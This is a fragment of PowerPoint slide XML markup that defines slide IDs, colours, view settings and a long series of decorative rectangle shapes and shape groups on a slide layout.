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460" r:id="rId3"/>
    <p:sldId id="1459" r:id="rId5"/>
    <p:sldId id="1326" r:id="rId6"/>
    <p:sldId id="1417" r:id="rId7"/>
    <p:sldId id="1446" r:id="rId8"/>
    <p:sldId id="1447" r:id="rId9"/>
    <p:sldId id="1449" r:id="rId10"/>
    <p:sldId id="1450" r:id="rId11"/>
    <p:sldId id="1456" r:id="rId12"/>
    <p:sldId id="1452" r:id="rId13"/>
    <p:sldId id="1424" r:id="rId14"/>
  </p:sldIdLst>
  <p:sldSz cx="12192635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yz" initials="x" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="秦 莫天" initials="秦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FEFEF"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="003366"/>
    <a:srgbClr val="3399FF"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="5F5F5F"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="66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86026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1368" y="78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2011"/>
        <p:guide pos="3732"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="321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1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6885" y="720725"/>
            <a:ext cx="640143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7A1ED033-5F5C-4572-AE4B-7CFF71C657D2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7D939-5749-4C63-8AED-0305FE88E523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 descr="掌控者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3835" y="1240790"/>
            <a:ext cx="1740535" cy="621665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12193201" cy="3068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" name="AutoShape 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3759570" y="3113088"/>
            <a:ext cx="7823970" cy="838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6" name="Rectangle 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10262610" y="1741488"/>
            <a:ext cx="711270" cy="8382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7" name="Rectangle 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9246510" y="1131888"/>
            <a:ext cx="1219320" cy="8382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8" name="Rectangle 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10770660" y="141288"/>
            <a:ext cx="1219320" cy="15240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9" name="Rectangle 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="750888"/>
            <a:ext cx="711270" cy="5334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" name="Rectangle 110"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8433630" y="2884488"/>
            <a:ext cx="711270" cy="5334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1" name="Rectangle 114"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5080500" y="2655888"/>
            <a:ext cx="203220" cy="152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2" name="Rectangle 120"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5690160" y="2655888"/>
            <a:ext cx="203220" cy="152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3" name="Rectangle 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5994990" y="2655888"/>
            <a:ext cx="203220" cy="152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4" name="Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6299820" y="2655888"/>
            <a:ext cx="203220" cy="152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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 211"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299820" y="1741488"/>
            <a:ext cx="1727370" cy="838200"/>
            <a:chOff x="2976" y="1440"/>
            <a:chExt cx="816" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 104"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="144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7" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1728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8" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="158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9" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1728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0" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1872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1" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="158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2" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1872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3" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="144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4" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="158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5" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1728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6" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1872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7" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="144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8" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1728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9" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="158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0" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1728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1" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1872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32" name="Group 212"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4470840" y="1970088"/>
            <a:ext cx="1727370" cy="609600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="816" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="158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4" name="Rectangle 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1872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5" name="Rectangle 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="158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6" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1728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7" name="Rectangle 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1872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8" name="Rectangle 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="158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9" name="Rectangle 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="1872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0" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="158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gray">
            <a:xfrm>
              <a:off x="2832" y="1728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2" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1872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3" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="1872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4" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="1872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45" name="Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016100" y="3570288"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776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7" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2065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8" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207"/>
              <a:ext cx="95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9" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1776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0" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920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1" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="2065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2" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776"/>
              <a:ext cx="97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3" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2065"/>
              <a:ext cx="97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4" name="Rectangle 152"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2207"/>
              <a:ext cx="97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5" name="Rectangle 153"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776"/>
              <a:ext cx="98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6" name="Rectangle 154"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920"/>
              <a:ext cx="98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7" name="Rectangle 155"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065"/>
              <a:ext cx="98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8" name="Rectangle 156"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207"/>
              <a:ext cx="98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9" name="Rectangle 157"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1920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0" name="Rectangle 158"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2207"/>
              <a:ext cx="97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1" name="Rectangle 159"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776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2" name="Rectangle 160"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1920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3" name="Rectangle 161"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="2065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4" name="Rectangle 162"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776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5" name="Rectangle 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="2065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6" name="Rectangle 164"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632"/>
              <a:ext cx="95" cy="97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7" name="Rectangle 165"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776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8" name="Rectangle 166"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1920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9" name="Rectangle 167"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="2065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0" name="Rectangle 168"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1632"/>
              <a:ext cx="95" cy="97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1" name="Rectangle 169"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1920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2" name="Rectangle 170"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1776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3" name="Rectangle 171"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1920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4" name="Rectangle 172"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="2065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5" name="Rectangle 173"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="2065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6" name="Rectangle 174"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="2065"/>
              <a:ext cx="97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77" name="Group 175"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315920" y="827088"/>
            <a:ext cx="3556350" cy="1066800"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Rectangle 176"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776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9" name="Rectangle 177"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="206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 userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2208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1" name="Rectangle 179"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1776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2" name="Rectangle 180"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1920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3" name="Rectangle 181"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="206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4" name="Rectangle 182"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="1776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5" name="Rectangle 183"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="206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6" name="Rectangle 184"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="2208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7" name="Rectangle 185"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776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8" name="Rectangle 186"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920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9" name="Rectangle 187"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="206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0" name="Rectangle 188"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2208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1" name="Rectangle 189"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="192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2" name="Rectangle 190"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2208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3" name="Rectangle 191"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776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4" name="Rectangle 192"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="192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5" name="Rectangle 193"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="206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6" name="Rectangle 194"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776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7" name="Rectangle 195"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="206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8" name="Rectangle 196"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632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9" name="Rectangle 197"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776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0" name="Rectangle 198"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="192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1" name="Rectangle 199"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="206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2" name="Rectangle 200"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1632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3" name="Rectangle 201"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="192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" name="Rectangle 202"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
